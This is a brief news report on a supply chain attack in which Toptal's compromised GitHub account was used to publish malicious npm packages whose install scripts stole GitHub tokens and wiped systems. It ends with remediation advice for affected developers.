Unknown threat actors have compromised the GitHub organization account of the talent network Toptal in what appears to be a highly targeted supply chain attack. The attackers used the access to publish 10 malicious packages to the npm registry, according to a report by software supply chain security company Socket.
The malicious packages, which were downloaded roughly 5,000 times before being removed, contained payloads capable of exfiltrating GitHub authentication tokens and destroying victim systems. Each of the Node.js libraries contained identical code embedded in their package.json files, designed to operate across both Windows and Linux platforms.
Socket's analysis showed that the threat actors weaponized the preinstall and postinstall scripts within the packages. Upon execution, the scripts would transmit the victim’s GitHub authentication token to a malicious endpoint hosted on a webhook[.]site domain. The scripts then would proceed to recursively delete all files and directories from the infected system.
In addition to the package tampering, the attackers made 73 private repositories from Toptal's GitHub account publicly accessible.
It remains unclear how the initial compromise occurred. All malicious packages have since been taken down, and the impacted libraries have been reverted to their latest safe versions.
Developers and organizations who downloaded any of the affected packages are recommended to immediately audit their systems, rotate compromised credentials, and restore from trusted backups if any suspicious activity is detected.